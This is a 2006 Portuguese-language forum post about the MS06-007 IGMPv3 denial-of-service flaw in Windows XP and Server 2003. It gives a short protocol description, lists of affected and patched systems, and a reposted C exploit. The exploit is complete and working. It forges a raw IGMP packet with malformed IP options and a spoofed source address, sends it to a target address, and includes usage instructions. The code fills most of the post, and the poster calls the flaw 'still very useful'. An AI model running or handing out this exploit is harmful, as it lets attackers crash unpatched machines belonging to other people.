IGMP v3 DoS

Started by HadeS, 14 de June , 2006, 09:14:09 PM



HadeS

Primeiro, uma breve descrição do protocolo IGMP: O protocolo de gerenciamento de grupo (IGMP - Internet Group Management Protocol, ou Protocolo de Gerenciamento de Grupos Internet) é usado por hosts para reportar a roteadores multicast vizinhos os grupos de hosts dos quais participam. É um protocolo assimétrico e é especificado aqui do ponto de vista de um host, ao invés do de um roteador multicast.

Descrição da falha:
A vulnerabilidade não é muito recente, porém ainda é muito útil. Ela permite a um atacante enviar um pacote IGMP especialmente formatado, levando a uma condição de negação de serviço.

De acordo com o alerta, é possível diminuir o impacto dessa vulnerabilidade através de boas práticas na criação de regras de firewall. O firewall do Windows deve proteger ainda contra ataques realizados com pacotes IGMP unicast.


Sistemas afetados:

- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 para sistemas Itanium-based
- Microsoft Windows Server 2003 SP1 para sistemas Itanium-based
- Microsoft Windows Server 2003 x64 Edition


Patches:

- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP Professional x64 Edition
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 Service Pack 1
- Microsoft Windows Server 2003 para sistemas Itanium-based
- Microsoft Windows Server 2003 SP1 para sistemas Itanium-based
- Microsoft Windows Server 2003 x64 Edition


Exploit:

/*
        IGMP v3 DoS Exploit

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
        ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

        by Alexey Sintsov (dookie@inbox.ru)

        Req:
                Administrator rights on system
                Windows Firewall off (for sending RAW packets)

        Affected Products:
                Microsoft Corporation Windows XP All
                Microsoft Corporation Windows Server 2003 All
 */


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

/*
 * IPv4 header as laid out on the wire, followed by a fixed 4-byte options
 * field.  Field widths assume the Windows ABI (unsigned int is 4 bytes);
 * with natural alignment no padding is inserted, so sizeof(IPHEADER) == 24
 * and the header length sendIGMP() writes into verlen is 24/4 = 6 words.
 * Multi-byte fields hold network byte order only because the caller fills
 * them with htons()/inet_addr(); the type itself does no conversion.
 */
typedef struct iphdr
{
        unsigned char verlen; // IP version (high nibble) & header length in 32-bit words (low nibble)
        unsigned char tos; // Type of service
        unsigned short total_len; // Total length of the packet (header + payload), network order
        unsigned short ident; // Identification field
        unsigned short frag_and_flags; // Flags (3 bits) + fragment offset (13 bits)
        unsigned char ttl; // Time to live
        unsigned char proto; // Protocol number of the payload (IGMP here)
        unsigned short checksum; // IP header checksum
        unsigned int sourceIP; // Source IP, network order
        unsigned int destIP; // Destination IP, network order
        unsigned short options[2]; // 4 bytes of IP options; sendIGMP() leaves all four zero

} IPHEADER;

/*
 * IGMPv3 Membership Query in the RFC 3376 layout, with room for exactly one
 * source address.  Assumes unsigned long is 4 bytes (Windows, 32- and
 * 64-bit): then the fields pack to 16 bytes with no padding, which is the
 * size sendIGMP() relies on.  On an LP64 toolchain `group` and `addes`
 * would be 8 bytes each and the wire layout would be wrong.
 */
typedef struct igmphdr {
          unsigned char type; // 0x11 = Membership Query
          unsigned char code; // Max Resp Code
                  unsigned short checksum; // one's-complement checksum over the IGMP message
                  unsigned long group; // Group Address (0.0.0.0 = General Query), network order
                  unsigned char ResvSQVR; // Resv (4 bits) | S flag (1 bit) | QRV (3 bits)
                  unsigned char QQIC; // Querier's Query Interval Code
                  unsigned short num; // Number of Sources that follow, network order
                  unsigned long addes; // the single Source Address, network order

 } IGMPHEADER;

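/*
 * One's-complement Internet checksum (RFC 1071 style) over `size` bytes.
 *
 * buffer: start of the data, consumed as native 16-bit words.
 * size:   number of bytes to sum.  An odd trailing byte is added as the low
 *         byte of a zero-padded word.  A size <= 0 sums nothing and yields
 *         0xFFFF (the original tested `if (size)`, so a negative size would
 *         have read one byte it was never asked to sum).
 * Returns the 16-bit one's-complement of the folded sum.  Because the sum is
 * byte-order independent, the value is ready to be stored into a header
 * checksum field exactly as returned when the data was in network order.
 *
 * Uses plain unsigned short / unsigned char in place of the Winsock USHORT /
 * UCHAR typedefs (identical types on Windows) so the routine also builds
 * and can be unit-tested on non-Windows toolchains.
 */
unsigned short checksum(const unsigned short *buffer, int size)
{
    unsigned long cksum = 0;

    /* Whole 16-bit words first. */
    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(unsigned short);
    }

    /* Exactly one byte left over (odd length): add it zero-extended. */
    if (size > 0)
        cksum += *(const unsigned char *)buffer;

    /* Fold the carries back into the low 16 bits; two passes suffice for
       any 32-bit partial sum. */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);

    return (unsigned short)(~cksum);
}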

/*
 * Build one IGMPv3 Membership Query inside a hand-made IPv4 header and send
 * it once over a raw socket to `b`.
 *
 * a: dotted-quad string written into the IP source address field.
 * b: dotted-quad string used as the IP destination, and also as the single
 *    source address listed inside the IGMP query.
 * Returns 1 after a successful sendto(); 0/FALSE when WSAStartup, socket
 * creation, setsockopt or sendto fails (an error is printed and the socket
 * and Winsock are released first).  inet_addr() results are not checked, so
 * an unparsable address is simply carried into the packet as returned.
 *
 * Wire shape, for whoever has to write a detection rule: IPv4 with IHL = 6
 * (24-byte header, the last four option bytes all zero), protocol IGMP,
 * TTL 128, identification 0, total length 40, followed by a 16-byte IGMPv3
 * query: type 0x11, max-resp code 5, group 0.0.0.0, one source record that
 * equals the destination address.
 */
int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;
        IGMPHEADER igmpHeader;
        // Parsed as-is; a malformed string yields inet_addr()'s error value,
        // which is then used as the address without further checks.
        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        // 60 bytes of scratch space; the packet assembled below occupies
        // 24 (IP) + 16 (IGMP) = 40 bytes, plus 4 bytes explicitly zeroed after it.
        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        // Raw IP socket; creating one is what needs Administrator rights
        // (see the file header).  0x01 is WSA_FLAG_OVERLAPPED.
        SOCKET sock;
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        // Option 2 is IP_HDRINCL on Winsock: the IP header we place in the
        // buffer is transmitted as given instead of being generated by the stack.
        BOOL flag=TRUE;
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99); // no meaning for a raw IP send; any value works
        ssin.sin_addr.s_addr=dst_addr;

        // Version 4 in the high nibble, header length in 32-bit words in the
        // low nibble: 24/4 = 6 (assumes a 4-byte unsigned long, as on Windows).
        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); // 24 + 16 = 40

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0; // zero while the checksum is computed

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;

        // IP options: four zero bytes, i.e. an IHL of 6 with an all-zero
        // option field.  Per the author this is the malformed element that
        // triggers the MS06-007 condition; on the wire it is the most
        // distinctive feature of the packet (options on an IGMP query).
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5; // Max Resp Code
        igmpHeader.num=htons(1); // one source address follows
        igmpHeader.ResvSQVR=0x0; // Resv/S/QRV all zero
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0"); // group 0.0.0.0 = General Query
        igmpHeader.addes=dst_addr; // the single source record = destination

        igmpHeader.checksum=0; // zero while the checksum is computed

        // Stage only the IGMP message at the start of the buffer and checksum
        // it; the result goes into the header copy that is sent below.
        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        // Assemble the final datagram: IP header, then the IGMP message with
        // its checksum filled in, then four zero bytes past the end.
        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        // IP checksum field: computed over the full 40 bytes assembled above,
        // then byte-swapped, and written back by re-copying the header.
        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        // Exactly one datagram of 40 bytes is sent.
        rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

        return 1;
}

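/*
 * Entry point: igmps.exe <target ip> <source ip>.
 *
 * argv[1] is the destination of the crafted packet and argv[2] the address
 * placed in its IP source field; sendIGMP() takes (source, destination), so
 * the two are passed in swapped order.  Always returns 0, as the original
 * did; sendIGMP()'s own result is not propagated.
 */
int main(int argc, char **argv)
{
        // Two positional arguments are consumed below.  The original tested
        // argc < 2, so a single argument slipped through and argv[2] (NULL)
        // was handed to inet_addr() inside sendIGMP().
        if(argc<3)
        {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                return 0; // same exit status as the original exit(0), without needing <stdlib.h>
        }

        sendIGMP(argv[2], argv[1]);
        return 0;
}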


Fonte do exploit: milw0rm.com


HadeS

Shady



Mundus Vult Decipi